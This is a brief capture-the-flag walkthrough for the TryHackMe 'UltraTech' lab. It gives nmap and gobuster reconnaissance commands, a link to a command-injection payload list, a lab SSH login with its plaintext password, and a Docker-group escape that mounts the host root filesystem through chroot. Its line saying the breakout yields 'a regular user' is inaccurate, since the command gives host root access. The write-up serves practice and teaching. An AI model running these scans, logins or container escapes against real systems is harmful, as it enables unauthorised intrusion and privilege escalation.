UltraTech

Room Link: https://tryhackme.com/room/ultratech1

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8081 - HTTP

Kali

gobuster dir -u http://$VICTIM:8081 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/31331 - HTTP

Kali

gobuster dir -u http://$VICTIM:31331 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Command Injection Payload: https://github.com/payloadbox/command-injection-payload-list

We can see two interesting users in the passwd file

TCP/22 - SSH

Kali

ssh r00t@$VICTIM
Password: n100906

Privilege Escalation

Exploit: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation

We can see our user is in the docker group, so we were able to break out and become a regular user.

Victim

groups

Victim

find / -name docker.sock 2>/dev/null

Victim

docker images

Victim

docker run -it -v /:/host/ bash chroot /host/ bash
